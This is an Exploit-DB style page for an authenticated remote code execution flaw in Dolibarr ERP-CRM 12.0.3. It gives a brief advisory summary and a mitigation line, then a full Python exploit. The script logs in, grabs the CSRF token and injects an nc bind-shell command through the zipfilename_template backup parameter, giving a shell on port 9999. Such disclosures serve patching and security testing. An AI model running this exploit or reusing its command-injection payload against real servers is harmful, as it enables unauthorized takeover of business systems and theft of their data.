Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated)

vendor:

Dolibarr ERP-CRM

by:

Yilmaz Degirmenci

9.8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Dolibarr ERP-CRM

Affected Version From: 12.0.3

Affected Version To: 12.0.3

Patch Exists: Yes

Related CWE: N/A

CPE: a:dolibarr:dolibarr:12.0.3

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Kali Linux 2020.2

2020

Dolibarr ERP-CRM 12.0.3 – Remote Code Execution (Authenticated)

Open source ERP-CRM Dolibarr 12.0.3 is vulnerable to authenticated Remote Code Execution Attack. An attacker who has the access the admin dashboard can manipulate the backup function by inserting payload into the zipfilename_template parameter at page /admin/tools/dolibarr_export.php by clicking on the button "Generate Backup" thus triggering command injection on target system.

Mitigation:

Ensure that the Dolibarr ERP-CRM is up to date and all security patches are applied.

Source

Exploit-DB raw data:

# Exploit Title: Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated)
# Date: 2020.12.17
# Exploit Author: Yilmaz Degirmenci
# Vendor Homepage: https://github.com/Dolibarr/dolibarr
# Software Link: https://sourceforge.net/projects/dolibarr/
# Version: 12.0.3
# Tested on: Kali Linux 2020.2

# Vulnerability Description: Open source ERP-CRM Dolibarr 12.0.3 is
# vulnerable to authenticated Remote Code Execution Attack. An attacker who
# has the access the admin dashboard can manipulate the backup function by
# inserting payload into the zipfilename_template parameter at page
# /admin/tools/dolibarr_export.php by clicking on the button "Generate
# Backup" thus triggering command injection on target system.

import requests
from bs4 import BeautifulSoup
from bs4 import Comment
import re
import lxml
import json
import urllib

username = input("username: ")
password = input("password: ")
root_url = input("Root URL: http://192.168.0.15/ --> ")

print("Exploit is sent! Check out if the bind shell on port 9999 active!")

listener_port = "9999"

login_url = root_url + "/index.php?mainmenu=home "
vulnerable_url = root_url + "/admin/tools/dolibarr_export.php"
upload_url = root_url + "/admin/tools/export_files.php"

session = requests.Session()
request = session.get(login_url)

# Get the token value
soup = BeautifulSoup(request.text,"lxml")
token = soup.find("input",{'name':'token'})['value']

# Login
body = {"token":token, "actionlogin":"login",
"loginfunction":"loginfunction", "tz":"-5",
"tz_string":"America%2FNew_York", "dst_observed":"1",
"dst_first":"2020-03-8T01%3A59%3A00Z", "dst_second":
"2020-11-1T01%3A59%3A00Z", "screenwidth":"1668", "screenheight":"664",
"dol_hide_topmenu":"", "dol_hide_leftmenu":"",
"dol_optimize_smallscreen":"", "dol_no_mouse_hover":"",
"dol_use_jmobile":"", "username":username,"password":password}

session.post(login_url, data=body, cookies=request.cookies)

request = session.get(vulnerable_url)
token = soup.find("input",{'name':'token'})['value']

header = {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
Gecko/20100101 Firefox/80.0",
"Accept":"*/",
"Accept-Encoding": "gzip, deflate",
"Origin": root_url,
"Referer":
root_url+"/admin/tools/dolibarr_export.php?mainmenu=home&leftmenu=admintools",
"Upgrade-Insecure-Requests": "1"
}

body = {"token":token, "export_type":"server", "page_y":"1039",
"zipfilename_template":"documents_dolibarr_12.0.3_202012160422.tar
--use-compress-program='nc -c bash -nlvp  9999' %0a  :: ",
"compression":"gz"}

param = urllib.parse.urlencode(body, quote_via=urllib.parse.quote)

session.post(upload_url, data=body, params=param, cookies=request.cookies, headers=header)